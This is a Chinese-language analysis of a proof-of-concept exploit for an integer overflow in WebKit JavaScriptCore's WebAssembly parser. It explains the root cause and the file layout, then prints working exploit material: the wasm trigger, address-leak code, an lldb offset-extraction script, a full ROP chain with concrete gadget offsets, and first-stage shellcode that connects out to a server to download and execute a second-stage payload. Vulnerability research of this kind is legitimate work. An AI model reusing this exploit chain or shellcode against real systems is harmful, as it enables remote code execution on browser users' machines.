概述
关于 POC
gen_wasm.py
: 用于生成WebAssembly模块到rets.wasm文件shellcode
: 完成溢出漏洞后使用的第一阶段的shellcode, 默认会向localhost:1337请求并加载第二阶段(沙盒逃逸)shellcode, 以完成任意代码执行. (但第二阶段shellcode并未放出)stage2_server.py
: 用于监听本地1337端口, 以发送第二阶段shellcodepwn.html
: 浏览器漏洞利用入口, 调起pwn.jspwn.js
: 调起两个worker线程, 获取wasm数据并发放给worker线程worker.js
: worker线程, 用于加载wasm以触发漏洞worker2.js
: worker线程, 作为受害者线程承载ROP链以及shellcoderets.wasm
: 由gen_wasm.py
脚本生成的wasm二进制文件, 也就是实际触发漏洞时解析的目标WebAssembly程序rets.wat
: rets.wasm经过一些修改后, 由wabt反编译为wat文本, 辅助理解POC生成的wasm程序的结构jsc_offsets
: 是生成wasm前的一些基础信息, 如: 泄露地址到dylib基地址的偏移, ROP链中gadget的偏移地址, 关键调用的地址stage2_shellcode.bin
: 第二阶段shellcode, 由于没有可用的沙盒逃逸利用, 这里的stage2_shellcode只是做了int3断点以及一些无用数据*
文件是拿到POC作者未提供的, 需要使用脚本生成, 或是自己按需补充rce % python3 gen_wasm.py -offs prod
leak_off, hndl_raw_mem_off, gadg, syms = 15337245, 40, {'ret': 15347, 'rdi': 4627172, 'rsi': 624110, 'rdx': 3993325, 'rcx': 917851, 'jmp_rax': 76691}, {'__ZN3JSC19ExecutableAllocator8allocateEmNS_20JITCompilationEffortE': 10101216, '_memcpy': 16987498, '_dlsym': 16987090}
module of len 0x10009316 written
漏洞原理分析
一句话描述
WebKit的JavaScriptCore在加载解析WebAssembly模块时, 栈大小计数器m_maxStackSize存在整数溢出问题, 进而导致WebAssembly函数序言(wasmPrologue)阶段的栈帧分配异常, 最终导致沙盒内的代码执行
Wasm模块 -> parse阶段 -> 函数序言(prologue)阶段 -> 运行函数体
Wasm模块 -> parse阶段(m_maxStackSize = 0xffffffff) -> 函数序言阶段(m_numCalleeLocals = 0; 不分配栈空间) -> 运行函数体, 入栈操作覆盖内存 -> 地址泄露 -> ROP链 -> shellcode
JavaScriptCore背景
LLInt -> BBQ -> OMG
JavaScript/llint/LowLevelInterpreter.asm
文件slow_path
, 在asm文件中可以看到这些函数 (这一点我们将在后面地址泄漏时提到)漏洞相关代码
解析器(WasmFunctionParser)
将负责验证函数的有效性, 这将涉及所有堆栈操作以及控制流分支的类型检查(使用m_controlStack
与 m_expressionStack
)// JavaScriptCore/wasm/WasmFunctionParser.h
Stack m_expressionStack;
ControlStack m_controlStack
// JavaScriptCore/wasm/WasmFunctionParser.h
enum class BlockType {
If,
Block,
Loop,
TopLevel
};
封闭块的表达式栈(enclosedExpressionStack)
分开生成器(WasmLLIntGenerator)
跟踪各种元数据, 包括当前整体堆栈大小(m_stackSize
)以及整个解析过程中栈容量的最大值(m_maxStackSize
), 当前堆栈大小有助于将抽象堆栈位置转换为本地堆栈的偏移量, 而最大堆栈值则将决定函数序言期间将分配的栈空间大小// JavaScript/wasm/WasmLLIntGenerator.cpp
unsigned m_stackSize { 0 };
unsigned m_maxStackSize { 0 };
m_stackSize
: 当前表达式栈(m_expressionStack)的长度, 根据参数传递约定, 在x86_64系统上, 默认分配2个非易失性寄存器(Callee-Saved Register)、6个通用寄存器(General Purpose Register)和8个浮点数寄存器(Floating Point Register)用于函数调用, 所以无论函数是否接收这么多参数, m_stackSize都从16
开始JSC::Wasm::numberOfLLIntCalleeSaveRegisters
: 根据调用约定保留的2个Callee-Save Register cpp // JavaScriptCore/wasm/WasmCallingConvention.h constexpr unsigned numberOfLLIntCalleeSaveRedisters = 2;
JSC::GPRInfo::numberOfArgumentRegisters
: 通用寄存器计数, x86_64下默认为6个// JavaScript/jit/GPRInfo.h
#if CPU(X86_64)
#if !OS(WINDOWS)
#define NUMBER_OF_ARGUMENT_REGISTERS 6u
......
class GPRInfo {
public:
typedef GPRReg RegisterType;
static constexpr unsigned numberOfRegisters = 11;
static constexpr unsigned numberOfArgumentRegisters = NUMBER_OF_ARGUMENT_REGISTERS
......
JSC::FPRInfo::numberOfArgumentRegisters
:浮点数寄存器计数, x86_64下默认为8个// JavaScriptCore/jit/FPRInfo.h
class FPRInfo {
public:
typedef FPRReg RegisterType;
static constexpr unsigned numberOfRegisters = 6;
static constexpr unsigned numberOfArgumentRegisters = is64Bit() ? 8 : 0;
......
m_maxStackSize
: 在wasm解析阶段, 跟踪函数内所需的最大栈长度, 通常在push操作时更新// JavaScriptCore/wasm/WasmLLIntGenerator.cpp
enum NoConsistencyCheckTag { NoConsistencyCheck };
ExpressionType push(NoConsistencyCheckTag)
{
m_maxStackSize = std::max(m_maxStackSize, ++m_stackSize);
return virtualRegisterForLocal(m_stackSize - 1);
}
// JavaScriptCore/wasm/WasmLLIntGenerator.cpp
std::unique_ptr<FunctionCodeBlock> LLIntGenerator::finalize()
{
RELEASE_ASSERT(m_codeBlock);
m_codeBlock->m_numCalleeLocals = WTF::roundUpToMultipleOf(stackAlignmentRegisters(), m_maxStackSize);
auto& threadSpecific = threadSpecificBuffer();
Buffer usedBuffer;
m_codeBlock->setInstructions(m_writer.finalize(usedBuffer));
size_t oldCapacity = usedBuffer.capacity();
usedBuffer.resize(0);
RELEASE_ASSERT(usedBuffer.capacity() == oldCapacity);
*threadSpecific = WTFMove(usedBuffer);
return WTFMove(m_codeBlock);
}
m_numCalleeLocals
: 在解析完成后, 该值在m_maxStackSize的基础上向上舍入
以对其堆栈(16字节对齐, 或是x86_64上的2个寄存器长度), 但m_numCalleLocals被声明为int
类型// WTF/wtf/StdLibExtras.h
ALWAYS_INLINE constexpr size_t roundUpToMultipleOfImpl(size_t divisor, size_t x)
{
size_t remainderMask = divisor - 1;
return (x + remainderMask) & ~remainderMask; // divisor = 2; x = 0xffffffff; return 0x100000000;
}
// Efficient implementation that takes advantage of powers of two.
inline size_t roundUpToMultipleOf(size_t divisor, size_t x)
{
ASSERT(divisor && !(divisor & (divisor - 1)));
return roundUpToMultipleOfImpl(divisor, x);
}
// JavaScriptCore/wasm/WasmFunctionCodeBlock.h
class FunctionCodeBlock{
......
private:
using OutOfLineJumpTargets = HashMap<InstructionStream::Offset, int>;
uint32_t m_functionIndex;
int m_numVars { 0 };
int m_numCalleeLocals { 0 }; // 0x100000000 ==> m_numCalleLocals = 0x00000000;
uint32_t m_numArguments { 0 };
Vector<Type> m_constantTypes;
......
macro wasmPrologue(codeBlockGetter, codeBlockSetter, loadWasmInstance)
......
# Get new sp in ws1 and check stack height.
loadi Wasm::FunctionCodeBlock::m_numCalleeLocals[ws0], ws1 # <---- m_numCalleeLocals
lshiftp 3, ws1
addp maxFrameExtentForSlowPathCall, ws1
subp cfr, ws1, ws1
bpa ws1, cfr, .stackOverflow
bpbeq Wasm::Instance::m_cachedStackLimit[wasmInstance], ws1, .stackHeightOK
.stackOverflow:
throwException(StackOverflow)
.stackHeightOK:
move ws1, sp
......
漏洞利用
触发漏洞
2^32次push操作
的wasm函数, POC最终选择使用之前提到的多值范式, 以及解析器对unreachable代码的处理相结合的方法unreachable
显式声明, 或是无条件分支跳转指令后后无任何调用的代码段(dead code
), 生成器会直接将声明的返回类型push到封闭栈中auto LLIntGenerator::addEndToUnreachable(ControlEntry& entry, const Stack& expressionStack, bool unreachable) -> PartialResult
{
......
for (unsigned i = 0; i < data.m_signature->returnCount(); ++i) {
......
if (unreachable)
entry.enclosedExpressionStack.constructAndAppend(data.m_signature->returnType(i), tmp); // push returnType -> enclosedExpressionStack
else
entry.enclosedExpressionStack.append(expressionStack[i]);
}
......
return { };
}
// WTF/wtf/Vector.h
bool allocateBuffer(size_t newCapacity)
{
static_assert(action == FailureAction::Crash || action == FailureAction::Report);
ASSERT(newCapacity);
if (newCapacity > std::numeric_limits<unsigned>::max() / sizeof(T)) { // check
if constexpr (action == FailureAction::Crash)
CRASH();
......
size_t sizeToAllocate = newCapacity * sizeof(T);
......
m_capacity = sizeToAllocate / sizeof(T); // max 2^32
m_buffer = newBuffer;
return true;
}
(module
(type (;0;) (func))
(type (;1;) (func (result f64 f64 ... ))) ;; a lot of f64 (f64 * 0x10000000)
(type (;2;) (func (param i64 i64)))
(import "e" "mem" (memory (;0;) 1))
(func (;0;) (type 2) (param i64 i64)
;; "real" code we want to execute can be placed here
i32.const 1 ;; use 'br_if', or the following code would be 'dead_code'
br_if 0 (;@0;) ;;
block ;; label = @1 ;; begin to fill 32GB
block (result f64 f64 ... ) ;; label = @2 ;; push m_maxStackSize to 0xffffffff
unreachable ;; then m_numCalleeLocals = 0x0
end ;; when parsing completes.
;; current stack has 0x10000000 values, m_maxStackSize = 0x10000000
block ;; label = @2
;; new block has an empty expression stack
block (result f64 f64 ... ) ;; label = @3
unreachable
end
;; current stack has 0x10000000 values, m_maxStackSize = 0x20000000
block ;; label = @3
block (result f64 f64 ... ) ;; label = @4
unreachable
end
......
br 0 (;@3;)
end
br 0 (;@2;)
end
br 0 (;@1;)
end
return)
(func (;1;) (type 0)
i64.const 0
i64.const 0
call 0)
(export "rets" (func 1)))
地址泄漏
| ... |
| loc1 |
| loc0 |
| callee-saved 1 |
| callee-saved 0 |
rsp, rbp -> | previous rbp |
| return address |
i64
参数 (type (;2;) (func (param i64 i64)))
(func (;0;) (type 2) (param i64 i64)
slow_path_wasm_out_of_line_jump_target
的slow_path函数, 适用于wasm模块中偏移量太大而无法直接以字节码格式编码的跳转分支, 在此, 至少为0x80的偏移量就可以block
;; branch out of block
;; an unconditional `br 0` will not work as the filler would be dead code
i32.const 1
br_if 0
i32.const 0 ;; filler code here...
i32.popcnt ;; such that the offset from the above branch
drop ;; to the end of the block is >= 0x80
......
end
JavaScriptCore dylib
中的一个固定偏移, 我们可以事先计算该偏移量, 以在程序运行时得到该dylib在内存中的基地址; loc1中则包含一个当前的栈地址
; 这两者的信息为我们提供了远程代码执行所需的信息泄漏STACK GUARD 70000b255000-70000b256000 [ 4K ] ---/rwx stack guard for thread 1
Stack 70000b256000-70000b2d8000 [ 520K ] rw-/rwx thread 1
STACK GUARD 70000b2d8000-70000b2d9000 [ 4K ] ---/rwx stack guard for thread 2
Stack 70000b2d9000-70000b35b000 [ 520K ] rw-/rwx thread 2
i32 .const 1
i32 .const 2
i32 .const 3
i32 .add
block ;; label = @1
local.get 0
i64.const 15337245 ;; subtract offset to JavaScriptCore dylib base
i64.sub
local.set 0
local.get 1
i64.const 144312 ;; offset to where the ropchain will be
i64.sub
local.set 1
i64.const 0 ;; push a ton of constants to hop over the guard page
i64.const 0
......
local.get 0
i64.const 15347 ;; ROP begin
i64.add ;; nop
drop
drop
;; write ROP chain to stack
end
addrof()
和fakeobj()
来渐进式的获取漏洞利用, 而是一个很不错的老式ROP链即可lldb.recvuntil("\n\n")
里没有返回的话, 检查一下你的lldb dis指令结束时是否少一个换行符, 按实际需要修改脚本即可)def get_jsc_offsets_from_shared_cache():
open("/tmp/t.c", "w").write('''
#include <dlfcn.h>
int main() {
dlopen("/System/Library/Frameworks/JavaScriptCore.framework/Versions/A/JavaScriptCore", RTLD_LAZY);
asm volatile("int3");
return 0;
}
''')
os.system("clang /tmp/t.c -o /tmp/t")
lldb = subprocess.Popen(["lldb","--no-lldbinit","/tmp/t"], bufsize=0, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
lldb.sendline = lambda s: lldb.stdin.write(s.encode('utf-8')+b'\n')
def m_recvuntil(s):
s = s.encode('utf-8')
buf = b""
while not buf.endswith(s):
buf += lldb.stdout.read(1)
return buf
lldb.recvuntil = m_recvuntil
try:
lldb.sendline("settings set target.x86-disassembly-flavor intel")
lldb.sendline("r")
lldb.recvuntil("stopped")
lldb.sendline("ima list -h JavaScriptCore")
lldb.recvuntil("0] ")
jsc_base = int(lldb.recvuntil("\n")[:-1], 16)
lldb.sendline("dis -n slow_path_wasm_out_of_line_jump_target")
lldb.recvuntil("JavaScriptCore`slow_path_wasm_out_of_line_jump_target:\n")
disas = lldb.recvuntil("\n\n").decode("utf-8")
disas = disas.split('\n')
disas = [disas[i] for i in range(1,len(disas)) if "call " in disas[i-1]][0]
leak_off = int(disas.split(' <')[0].strip(), 16)-jsc_base
......
ROP链
local.get 0 ;; JavaScriptCore dylib address
i64.const <offset to gadget>
i64.add ;; the addition will write the gadget to the stack
MAP_JIT(0x800)
, 而该标志仅在mmap创建时授予.mprotect
将shellcode放在栈上并返回调用到它ExecutableAllocator::allocate
, 以在现有的rwx JIT区域中保留一个地址, 然后使用memcpy
将shellcode放在那里, 最终返回到它并执行 local.get 0
i64.const 4627172 ;; pop_rdi
i64.add
drop
drop
local.get 1
i64.const 80
i64.add
drop
drop
local.get 0
i64.const 3993325 ;; pop rdx
i64.add
drop
drop
i64.const 144 ;; len(shellcode)
i64.const 0
i64.or
drop
drop
local.get 0
i64.const 917851 ;; pop rcx
i64.add
drop
drop
i64.const 1
i64.const 0
i64.or
drop
drop
local.get 0
i64.const 10101216 ;; syms['__ZN3JSC19ExecutableAllocator8allocateEmNS_20JITCompilationEffortE']
i64.add
drop
drop
local.get 0
i64.const 4627172 ;; pop rdi
i64.add
drop
drop
local.get 1
i64.const 262144 ;; 0x40000
i64.sub
drop
drop
local.get 0
i64.const 624110 ;; pop rsi
i64.add
drop
drop
drop
local.get 0
i64.const 3993325 ;; pop rdx
i64.add
drop
drop
i64.const 48 ;; hndl_raw_mem_off+8
i64.const 0
i64.or
drop
drop
local.get 0
i64.const 16987498 ;; syms['_memcpy']
i64.add
drop
drop
local.get 0
i64.const 4627172 ;; pop rdi
i64.add
drop
drop
local.get 1
i64.const 176 ;; 22*8
i64.add
drop
drop
local.get 0
i64.const 624110 ;; pop rsi
i64.add
drop
drop
local.get 1
i64.const 262104 ;; 0x4000 - hndl_raw_mem_off
i64.sub
drop
drop
local.get 0
i64.const 3993325 ;; pop rdx
i64.add
drop
drop
i64.const 8
i64.const 0
i64.or
drop
drop
local.get 0
i64.const 16987498 ;; syms['_memcpy']
i64.add
drop
drop
local.get 0
i64.const 4627172 ;; pop rdi
i64.add
drop
drop
drop
local.get 0
i64.const 624110 ;; pop rsi
i64.add
drop
drop
local.get 1
i64.const 248 ;; 31*8
i64.add
drop
drop
local.get 0
i64.const 3993325 ;; pop rdx
i64.add
drop
drop
i64.const 144 ;; len(shellcode)
i64.const 0
i64.or
drop
drop
local.get 0
i64.const 16987498 ;; syms['_memcpy']
i64.add
drop
drop
local.get 0
i64.const 4627172 ;; pop rdi, pass dlsym to shellcode
i64.add
drop
drop
local.get 0
i64.const 16987090 ;; syms['_dlsym']
i64.add
drop
drop
local.get 0
i64.const 76691 ;; gadg['jmp_rax']
i64.add
drop ;; begin to write shellcode
i64.const 144115607791438153
i64.or
drop
......
shellcode
sc = '''
## save dlsym pointer
mov r15, rdi
## socket(AF_INET, SOCK_STREAM, 0)
mov eax, 0x2000061
mov edi, 2
mov esi, 1
xor edx, edx
syscall
mov rbp, rax
## create addr struct
mov eax, dword ptr [rip+ipaddr]
mov r14, rax
shl rax, 32
or rax, 0x%x
push rax
mov eax, 0x2000062
mov rdi, rbp
mov rsi, rsp
mov dl, 0x10
syscall
## read sc size
mov eax, 0x2000003
mov dl, 8
syscall
## mmap rwx
xor edi, edi
pop rsi
mov dl, 7
mov r10d, 0x1802 # MAP_PRIVATE|MAP_ANONYMOUS|MAP_JIT
xor r8, r8
dec r8
xor r9, r9
mov eax, 0x20000c5
syscall
## read sc
mov rdi, rbp
mov rdx, rsi
mov rsi, rax
push rsi
read_hdr:
test rdx, rdx
jz read_done
mov eax, 0x2000003
## rdx gets trashed somehow in syscall???? no clue...
push rdx
syscall
pop rdx
sub rdx, rax
add rsi, rax
jmp read_hdr
read_done:
pop rsi
## jmp to sc, pass dlsym, socket, and server ip
## (need call not jmp to 16-byte align stack)
mov rdi, r15
xchg rsi, rbp
mov rdx, r14
call rbp
ipaddr:
'''%(2|(port<<16))
总结